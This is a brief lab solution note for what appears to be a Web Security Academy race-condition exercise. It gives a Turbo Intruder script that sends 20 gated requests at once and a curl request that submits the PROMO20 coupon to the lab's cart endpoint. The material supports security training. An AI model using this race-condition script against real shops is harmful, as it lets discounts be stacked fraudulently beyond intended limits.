
for this Lab we use Turbu Intruder with this script and that request:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=2,
                           engine=Engine.BURP2)
    for i in range(20):
        engine.queue(target.req, gate='race1')
    engine.openGate('race1')

def handleResponse(req, interesting):
    table.add(req)


curl -i -s -k -X $'POST' \
    -H $'Host: 0a9600cc04b222b481412f4b000400bd.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 52' -H $'Origin: https://0a9600cc04b222b481412f4b000400bd.web-security-academy.net' -H $'Referer: https://0a9600cc04b222b481412f4b000400bd.web-security-academy.net/cart' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' -H $'Sec-Gpc: 1' -H $'Te: trailers' \
    -b $'session=2JyPKK1XlGQJ56U6uodbsUPOv8PaXUO6' \
    --data-binary $'csrf=bcIkyTCb4lCfjV673IoXPycn1YVY4mJN&coupon=PROMO20' \
    $'https://0a9600cc04b222b481412f4b000400bd.web-security-academy.net/cart/coupon'